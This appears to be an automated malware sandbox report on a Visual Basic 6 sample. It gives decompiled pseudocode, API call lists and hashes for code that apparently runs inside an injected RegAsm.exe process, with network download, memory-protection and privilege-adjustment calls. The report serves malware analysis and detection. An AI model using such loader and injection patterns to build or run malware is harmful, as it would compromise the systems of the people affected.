				signed int _v208;
				signed int _t136;
				signed int _t137;
				signed char _t140;
				char* _t141;
				signed int _t142;
				signed int _t148;
				signed int _t153;
				char* _t156;
				signed int _t165;
				char* _t168;
				intOrPtr _t170;
				long long* _t188;
				intOrPtr* _t189;
				long long _t194;
				signed long long _t196;

				_push(0x401346);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t188;
				L00401340();
				_v12 = _t188;
				_v8 = 0x401308;
				_t168 =  &_v24;
				L00401556();
				_push(5);
				_push(0x4042dc);
				_push( &_v52);
				L0040140C();
				_v96 = 0x80020004;
				_v104 = 0xa;
				_v80 = 0x80020004;
				_v88 = 0xa;
				_push( &_v104);
				_push( &_v88);
				asm("fld1");
				_push(_t168);
				_push(_t168);
				_v60 = __fp0;
				asm("fld1");
				_push(_t168);
				_push(_t168);
				_v68 = __fp0;
				asm("fld1");
				_push(_t168);
				_push(_t168);
				 *_t188 = __fp0;
				asm("fld1");
				_push(_t168);
				_push(_t168);
				 *_t188 = __fp0;
				L00401406();
				L004014B4();
				asm("fcomp qword [0x401300]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t13 =  &_v172;
					 *_t13 = _v172 & 0x00000000;
					__eflags =  *_t13;
				} else {
					_v172 = 1;
				}
				_v144 =  ~_v172;
				_push( &_v104);
				_push( &_v88);
				_push(2);
				L0040153E();
				_t189 = _t188 + 0xc;
				_t136 = _v144;
				__eflags = _t136;
				if(_t136 != 0) {
					__eflags =  *0x4134b0;
					if( *0x4134b0 != 0) {
						_v176 = 0x4134b0;
					} else {
						_push(0x4134b0);
						_push(0x403ef0);
						L00401592();
						_v176 = 0x4134b0;
					}
					_v144 =  *_v176;
					_t165 =  *((intOrPtr*)( *_v144 + 0x48))(_v144, 0xdb,  &_v68);
					asm("fclex");
					_v148 = _t165;
					__eflags = _v148;
					if(_v148 >= 0) {
						_t33 =  &_v180;
						 *_t33 = _v180 & 0x00000000;
						__eflags =  *_t33;
					} else {
						_push(0x48);
						_push(0x403ee0);
						_push(_v144);
						_push(_v148);
						L0040158C();
						_v180 = _t165;
					}
					_t136 = _v68;
					_v164 = _t136;
					_t37 =  &_v68;
					 *_t37 = _v68 & 0x00000000;
					__eflags =  *_t37;
					L00401508();
				}
				_v144 = _v144 & 0x00000000;
				__eflags = _v144 - 2;
				if(_v144 >= 2) {
					L00401400();
					_v184 = _t136;
				} else {
					_v184 = _v184 & 0x00000000;
				}
				_t137 = _v144;
				 *((long long*)(_v40 + _t137 * 8)) =  *0x4012f8;
				_v144 = 1;
				__eflags = _v144 - 2;
				if(__eflags >= 0) {
					L00401400();
					_v188 = _t137;
				} else {
					_v188 = _v188 & 0x00000000;
				}
				_t170 = _v40;
				 *((long long*)(_t170 + _v144 * 8)) =  *0x4012f0;
				_v140 =  &_v52;
				_t194 =  *0x401218;
				_push(_t170);
				_push(_t170);
				 *_t189 = _t194;
				asm("fld1");
				_push(_t170);
				_push(_t170);
				 *_t189 = _t194;
				_t140 =  &_v140;
				_push(_t140);
				L004013FA();
				L004014B4();
				asm("fcomp qword [0x4012e8]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_t196 =  *0x4012e0 *  *0x4012d8;
					asm("fnstsw ax");
					__eflags = _t140 & 0x0000000d;
					if((_t140 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v192 = _t196;
					 *_t189 = _v192;
					_t140 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t170);
					asm("fclex");
					_v144 = _t140;
					__eflags = _v144;
					if(_v144 >= 0) {
						_t75 =  &_v196;
						 *_t75 = _v196 & 0x00000000;
						__eflags =  *_t75;
					} else {
						_push(0x84);
						_push(0x402448);
						_push(_a4);
						_push(_v144);
						L0040158C();
						_v196 = _t140;
					}
				}
				L004013EE();
				_v80 = _t140;
				_v88 = 8;
				_t141 =  &_v88;
				_push(_t141);
				L004013F4();
				__eflags = _t141 - 0xffff;
				_v144 =  ~(0 | _t141 != 0x0000ffff);
				L00401562();
				_t142 = _v144;
				__eflags = _t142;
				if(_t142 != 0) {
					_push(0xa5);
					L004014CC();
					_v28 = _t142;
				}
				__eflags =  *0x4134b0;
				if( *0x4134b0 != 0) {
					_v200 = 0x4134b0;
				} else {
					_push(0x4134b0);
					_push(0x403ef0);
					L00401592();
					_v200 = 0x4134b0;
				}
				_v144 =  *_v200;
				_t148 =  *((intOrPtr*)( *_v144 + 0x14))(_v144,  &_v72);
				asm("fclex");
				_v148 = _t148;
				__eflags = _v148;
				if(_v148 >= 0) {
					_t99 =  &_v204;
					 *_t99 = _v204 & 0x00000000;
					__eflags =  *_t99;
				} else {
					_push(0x14);
					_push(0x403ee0);
					_push(_v144);
					_push(_v148);
					L0040158C();
					_v204 = _t148;
				}
				_v152 = _v72;
				_t153 =  *((intOrPtr*)( *_v152 + 0xd8))(_v152,  &_v68);
				asm("fclex");
				_v156 = _t153;
				__eflags = _v156;
				if(_v156 >= 0) {
					_t112 =  &_v208;
					 *_t112 = _v208 & 0x00000000;
					__eflags =  *_t112;
				} else {
					_push(0xd8);
					_push(0x4042c8);
					_push(_v152);
					_push(_v156);
					L0040158C();
					_v208 = _t153;
				}
				_v168 = _v68;
				_v68 = _v68 & 0x00000000;
				L00401508();
				L0040155C();
				asm("wait");
				_push(0x411a96);
				L00401538();
				_v140 =  &_v52;
				_t156 =  &_v140;
				_push(_t156);
				_push(0);
				L004014C0();
				L00401538();
				L00401538();
				return _t156;
			}

0x00411651
0x0041165c
0x0041165d
0x00411669
0x00411671
0x00411674
0x0041167e
0x00411681
0x00411686
0x00411688
0x00411690
0x00411691
0x00411696
0x0041169d
0x004116a4
0x004116ab
0x004116b5
0x004116b9
0x004116ba
0x004116bc
0x004116bd
0x004116be
0x004116c1
0x004116c3
0x004116c4
0x004116c5
0x004116c8
0x004116ca
0x004116cb
0x004116cc
0x004116cf
0x004116d1
0x004116d2
0x004116d3
0x004116d6
0x004116db
0x004116e0
0x004116e6
0x004116e8
0x004116e9
0x004116f7
0x004116f7
0x004116f7
0x004116eb
0x004116eb
0x004116eb
0x00411706
0x00411710
0x00411714
0x00411715
0x00411717
0x0041171c
0x0041171f
0x00411726
0x00411728
0x0041172e
0x00411735
0x00411752
0x00411737
0x00411737
0x0041173c
0x00411741
0x00411746
0x00411746
0x00411764
0x00411781
0x00411784
0x00411786
0x0041178c
0x00411793
0x004117b5
0x004117b5
0x004117b5
0x00411795
0x00411795
0x00411797
0x0041179c
0x004117a2
0x004117a8
0x004117ad
0x004117ad
0x004117bc
0x004117bf
0x004117c5
0x004117c5
0x004117c5
0x004117d2
0x004117d2
0x004117d7
0x004117de
0x004117e5
0x004117f0
0x004117f5
0x004117e7
0x004117e7
0x004117e7
0x004117fb
0x0041180a
0x0041180d
0x00411817
0x0041181e
0x00411829
0x0041182e
0x00411820
0x00411820
0x00411820
0x0041183a
0x00411843
0x00411849
0x0041184f
0x00411855
0x00411856
0x00411857
0x0041185a
0x0041185c
0x0041185d
0x0041185e
0x00411861
0x00411867
0x00411868
0x0041186d
0x00411872
0x00411878
0x0041187a
0x0041187b
0x00411883
0x00411889
0x0041188b
0x0041188d
0x0040134c
0x0040134c
0x00411893
0x004118a0
0x004118ab
0x004118b1
0x004118b3
0x004118b9
0x004118c0
0x004118e2
0x004118e2
0x004118e2
0x004118c2
0x004118c2
0x004118c7
0x004118cc
0x004118cf
0x004118d5
0x004118da
0x004118da
0x004118c0
0x004118e9
0x004118ee
0x004118f1
0x004118f8
0x004118fb
0x004118fc
0x00411903
0x0041190c
0x00411916
0x0041191b
0x00411922
0x00411924
0x00411926
0x0041192b
0x00411930
0x00411930
0x00411933
0x0041193a
0x00411957
0x0041193c
0x0041193c
0x00411941
0x00411946
0x0041194b
0x0041194b
0x00411969
0x00411981
0x00411984
0x00411986
0x0041198c
0x00411993
0x004119b5
0x004119b5
0x004119b5
0x00411995
0x00411995
0x00411997
0x0041199c
0x004119a2
0x004119a8
0x004119ad
0x004119ad
0x004119bf
0x004119d7
0x004119dd
0x004119df
0x004119e5
0x004119ec
0x00411a11
0x00411a11
0x00411a11
0x004119ee
0x004119ee
0x004119f3
0x004119f8
0x004119fe
0x00411a04
0x00411a09
0x00411a09
0x00411a1b
0x00411a21
0x00411a2e
0x00411a36
0x00411a3b
0x00411a3c
0x00411a69
0x00411a71
0x00411a77
0x00411a7d
0x00411a7e
0x00411a80
0x00411a88
0x00411a90
0x00411a95

APIs

__vbaChkstk.MSVBVM60(?,00401346), ref: 00411669
__vbaStrCopy.MSVBVM60(?,?,?,?,00401346), ref: 00411681
__vbaAryConstruct2.MSVBVM60(?,004042DC,00000005,?,?,?,?,00401346), ref: 00411691
#674.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004116D6
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004116DB
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00411717
__vbaNew2.MSVBVM60(00403EF0,004134B0), ref: 00411741
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403EE0,00000048), ref: 004117A8
__vbaStrMove.MSVBVM60(00000000,?,00403EE0,00000048), ref: 004117D2
__vbaGenerateBoundsError.MSVBVM60 ref: 004117F0
__vbaGenerateBoundsError.MSVBVM60 ref: 00411829
#683.MSVBVM60(?,?,?,?,?), ref: 00411868
__vbaFpR8.MSVBVM60(?,?,?,?,?), ref: 0041186D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402448,00000084,?,?,?,?,?,?), ref: 004118D5
#609.MSVBVM60(?,?,?,?,?), ref: 004118E9
#557.MSVBVM60(00000008,?,?,?,?,?), ref: 004118FC
__vbaFreeVar.MSVBVM60(00000008,?,?,?,?,?), ref: 00411916
#569.MSVBVM60(000000A5,00000008,?,?,?,?,?), ref: 0041192B
__vbaNew2.MSVBVM60(00403EF0,004134B0,00000008,?,?,?,?,?), ref: 00411946
__vbaHresultCheckObj.MSVBVM60(00000000,00000002,00403EE0,00000014,?,?,?,?,?,?,?,?,00000008,?,?,?), ref: 004119A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,004042C8,000000D8,?,?,?,?,?,?,?,?,00000008,?,?,?), ref: 00411A04
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00000008,?,?,?,?,?), ref: 00411A2E
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00000008,?,?,?,?,?), ref: 00411A36
__vbaFreeStr.MSVBVM60(00411A96,?,?,?,?,?,?,?,?,?,?,00000008,?,?,?,?), ref: 00411A69
__vbaAryDestruct.MSVBVM60(00000000,?,00411A96,?,?,?,?,?,?,?,?,?,?,00000008,?,?), ref: 00411A80
__vbaFreeStr.MSVBVM60(00000000,?,00411A96,?,?,?,?,?,?,?,?,?,?,00000008,?,?), ref: 00411A88
__vbaFreeStr.MSVBVM60(00000000,?,00411A96,?,?,?,?,?,?,?,?,?,?,00000008,?,?), ref: 00411A90

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$BoundsErrorGenerateMoveNew2$#557#569#609#674#683ChkstkConstruct2CopyDestructList
String ID:
API String ID: 3321773744-0
Opcode ID: 5d2be563733a8e14f4bcf47e5b4470474859434e697cfc1d7f3dff274b90883d
Instruction ID: 7fce88d1439a51a95528ef88426d38fadd17539010caf5032261faee05f7d7ab
Opcode Fuzzy Hash: 5d2be563733a8e14f4bcf47e5b4470474859434e697cfc1d7f3dff274b90883d
Instruction Fuzzy Hash: B4B1C570900218EFEB21DF91CD45BEDB7B4BB04305F1081EAE149B72A1DB785A89DF69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6148 Parent PID: 7016 RegAsm.exeCOMMON

Executed Functions

Function 00FA1E61, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00FA233B,00000000,00000000,00000000,00000000), ref: 00FA1E78
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00FA1EF8

Strings

B5W, xrefs: 00FA1FC3

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: B5W
API String ID: 2038078732-2773888877
Opcode ID: 5e34039954112d6a5993612e13c742afd7da0f7e8276e9286c5441b4d5d6548c
Instruction ID: 850f74eac750db69d848239b2d368b5a833a587aabf7cf3b70c3bb388152eb16
Opcode Fuzzy Hash: 5e34039954112d6a5993612e13c742afd7da0f7e8276e9286c5441b4d5d6548c
Instruction Fuzzy Hash: 1341B8717403879EFF354E54CD91BEE366AEF05790F108029FE0EAA581E7B9DA44E610

Uniqueness

Uniqueness Score: -1.00%

Function 1FEEDC90, Relevance: 2.3, APIs: 1, Instructions: 829libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FEEE3E5

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62312e4f01932419fafbd354f9fb0067159f4e82a7eb4b2f0092078bcba78899
Instruction ID: be069e8957c007c31d8b1dd26f804ae932dbbdcbe2d2b1ccb2babd280b4620ea
Opcode Fuzzy Hash: 62312e4f01932419fafbd354f9fb0067159f4e82a7eb4b2f0092078bcba78899
Instruction Fuzzy Hash: 96624E35E006299FCB24DF64C854BDEB7F2AF88304F1185E9E90AAB265DB71AD45CF40

Uniqueness

Uniqueness Score: -1.00%

Function 20B13B98, Relevance: 2.0, Strings: 1, Instructions: 746COMMON

Download Yara Rule

Strings

:@fq, xrefs: 20B13D6B

Memory Dump Source

Source File: 00000003.00000002.910175671.0000000020B10000.00000040.00000001.sdmp, Offset: 20B10000, based on PE: false

Similarity

API ID:
String ID: :@fq
API String ID: 0-3673016210
Opcode ID: 0c09a91061cc1974863812081a4173e4b94bbef287d7c47dcd6a8e4c6f60f692
Instruction ID: cc5d609bd6948f8edc68f53f62d7fc3a9a7132ca10e405f41614301dd7610e98
Opcode Fuzzy Hash: 0c09a91061cc1974863812081a4173e4b94bbef287d7c47dcd6a8e4c6f60f692
Instruction Fuzzy Hash: 02426034B002058FDB24DBA8C4C479EFBF2EB49710F61856AE506EB366DB34DD858B51

Uniqueness

Uniqueness Score: -1.00%

Function 1FEEF950, Relevance: 1.7, APIs: 1, Instructions: 202libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FEEF990

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b50a9b328c80685e64e183b50b5201abab71ea92e8b9d2821ec1b164de6ef5b
Instruction ID: 7b2b9c659a6ee3716448b04639d3ec3544b8c4a3ed8e79bf297a7ed4297ad385
Opcode Fuzzy Hash: 0b50a9b328c80685e64e183b50b5201abab71ea92e8b9d2821ec1b164de6ef5b
Instruction Fuzzy Hash: 1C717E34A00255DFDB14DFB4D598BAEBBF2AF84305F218929D806EB355DB34E846CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA384F, Relevance: 1.6, APIs: 1, Instructions: 97nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00FA393F

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 065a3b5015acbc39af975e75c0a9d3e9e38ca8c112972e1223c61794163c8447
Instruction ID: 25613326de23ea5dd15a70609932a2edfee3db1a8efedf3681c43ca8c1f68da9
Opcode Fuzzy Hash: 065a3b5015acbc39af975e75c0a9d3e9e38ca8c112972e1223c61794163c8447
Instruction Fuzzy Hash: 97312970A00606CEEF25AE28C5583D536A7AF27334F95422AEC46C7491D3B8CDCA8601

Uniqueness

Uniqueness Score: -1.00%

Function 00FA18E7, Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00FA1CCC,?), ref: 00FA2C36

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 674aae46f207ed83130417c5d6b80cd96259fb0a6eda0864cf175500702f5286
Instruction ID: 6e75d194d8b9dc7a0aac7dc046feb2f7727d9b0010ab630b5ecf7694f66ad0b3
Opcode Fuzzy Hash: 674aae46f207ed83130417c5d6b80cd96259fb0a6eda0864cf175500702f5286
Instruction Fuzzy Hash: C0213DD17082816FDFA26B788E69BEE7F20AF1B330F14815EFC945A043D3588949B656

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2AF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1DB2AF87

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 71ce50260185e02a938717289d36b26ad86d1c49564fd91bcb3b2132f696750a
Instruction ID: 2a4243fec19151018b540560e458836b6cc54bb72397f50d90652d5aaa0c6465
Opcode Fuzzy Hash: 71ce50260185e02a938717289d36b26ad86d1c49564fd91bcb3b2132f696750a
Instruction Fuzzy Hash: 41219FB65097849FDB128F25DC84B52BFB4EF06210F09859AE989CF563D274E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2B089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 1DB2B0F5

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 5e1e046b68e272a45d6f7deff27fb6d2c49b03387fabf8ce5f9bece081e7b645
Instruction ID: dbd7c35c9556e8d5f0a910dbce58f0b2ce1724eaf1de90d3fb63606859c1bfe8
Opcode Fuzzy Hash: 5e1e046b68e272a45d6f7deff27fb6d2c49b03387fabf8ce5f9bece081e7b645
Instruction Fuzzy Hash: CD1190724093C09FD7228F15DC45A52FFB4EF06314F0984DAE9898F163D275A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FA1872, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00FA1CCC,?), ref: 00FA2C36

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6a4f42fc4ea407c869b1b96e5d65a8acb6954bb0d1caf19d0d35d2535acfbc56
Instruction ID: 13d5aa9705ed9e50a90aee4f1bc530175759e830940cf653de1950b03ae65137
Opcode Fuzzy Hash: 6a4f42fc4ea407c869b1b96e5d65a8acb6954bb0d1caf19d0d35d2535acfbc56
Instruction Fuzzy Hash: 1CF078C5B001153EEFB036AC9F94BEF3414CF93370F205619BD2092103D65C88896162

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2AF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1DB2AF87

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 6accf03919d6cb3e331f0e98398683b465b43486ade8f767208d9b3fddf63e57
Instruction ID: 10def2c32dee588145ec0733113ff0b0b94b610de2e64c997bca322bd72488af
Opcode Fuzzy Hash: 6accf03919d6cb3e331f0e98398683b465b43486ade8f767208d9b3fddf63e57
Instruction Fuzzy Hash: 2F115E769003409FDB21CF56D884B56FBE4EF04620F08C5AAED4ACB656D739E418CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2A09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1DB2A0D5

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 7a13781c67c89bd6256e35b953231dead3c4c0cb965e95e6e3d1d9a29b5d8b10
Instruction ID: 6b208fe81b8ef308373abb9752ea8e61903f5ac6436182ee19f0839096cb7f2f
Opcode Fuzzy Hash: 7a13781c67c89bd6256e35b953231dead3c4c0cb965e95e6e3d1d9a29b5d8b10
Instruction Fuzzy Hash: 7301BC72400340DFDB21CF5AD885B52FBA0EF04720F08C4AADE898B656D775E408CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB2B0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 1DB2B0F5

Memory Dump Source

Source File: 00000003.00000002.908102320.000000001DB2A000.00000040.00000001.sdmp, Offset: 1DB2A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: e584b65eba06654b350ce9a3ef6ea16123609adf1ed3d7db11e7df7e0fdea252
Instruction ID: 7067a21f6f0e09db9add449f20f602656ad3c16afee6cc57aa82cdb4144259f6
Opcode Fuzzy Hash: e584b65eba06654b350ce9a3ef6ea16123609adf1ed3d7db11e7df7e0fdea252
Instruction Fuzzy Hash: D6018B365003409FDB218F46D886B22FFA0EF04721F08C49ADE894B65AD775E418CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2BCE, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00FA1CCC,?), ref: 00FA2C36

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 472144daceb4a4485bd46f087b69062a51b1b17558930b622bd8a03534debbd3
Instruction ID: 476f3ec1c3de1a222210fd0d84cacdd8190e09a72db3595b3dbc8da28402a7f9
Opcode Fuzzy Hash: 472144daceb4a4485bd46f087b69062a51b1b17558930b622bd8a03534debbd3
Instruction Fuzzy Hash: 4DF0E2C5B0061829EFA036A99E85BAE3424CF53370F105619BD6081106862C88891691

Uniqueness

Uniqueness Score: -1.00%

Function 00FA33F9, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00FA31AE,00000040,00FA13AE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FA3412

Memory Dump Source

Source File: 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp, Offset: 00FA1000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 20B145F8, Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.910175671.0000000020B10000.00000040.00000001.sdmp, Offset: 20B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c472b11473e6ce8229a8b4022b91ee97acaf4315a3e331bc70c1ee07353289
Instruction ID: 2ed0968c03738c9cb0bc7b7f19e98cac64a7f3142ab72b2d2b4c534e78398377
Opcode Fuzzy Hash: 33c472b11473e6ce8229a8b4022b91ee97acaf4315a3e331bc70c1ee07353289
Instruction Fuzzy Hash: 6F91E735B002059BDB18DBBAC894B5EB7E7AF84350F25C469E906EB394EF34EC418791

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE30C0, Relevance: 24.0, APIs: 10, Strings: 3, Instructions: 1230librarywindowCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1FEE3114
PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB
:@fq, xrefs: 1FEE45C7
:@fq, xrefs: 1FEE4A05

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugExceptionLaunchRegisterWerp$CompatDataData2DispatcherExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunkUser
String ID: :@fq$:@fq$:@fq
API String ID: 2690095564-3738185570
Opcode ID: d3cfcb71f988a92a22a90edbadb5981d1c5f00b17cec2038368e5cc253a6b7bb
Instruction ID: e515ddac3130daa773dc29a5bcb63bff737f30558edb432ec61e0a41f1871047
Opcode Fuzzy Hash: d3cfcb71f988a92a22a90edbadb5981d1c5f00b17cec2038368e5cc253a6b7bb
Instruction Fuzzy Hash: 1FD2B978A016299FCB64DF68DC94B9DBBF2BB48302F1181E6D40AA7355DB349E85CF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE30F0, Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 696librarywindowCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1FEE3114
PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugExceptionLaunchRegisterWerp$CompatDataData2DispatcherExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunkUser
String ID: :@fq
API String ID: 2690095564-3673016210
Opcode ID: 887130a6238b1ff7d801e628612573b6e06fa60de6d07fd308c124d1acd0fc8c
Instruction ID: 450cf0124bc82cd18ff6daa5b352094ae886d80e298cc6e938affed4c8d1a725
Opcode Fuzzy Hash: 887130a6238b1ff7d801e628612573b6e06fa60de6d07fd308c124d1acd0fc8c
Instruction Fuzzy Hash: 5C728378A116299FCB64DF28DC94A9DBBF1BB48312F1181E6E90DA3315DB309E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3150, Relevance: 18.2, APIs: 9, Strings: 1, Instructions: 683librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
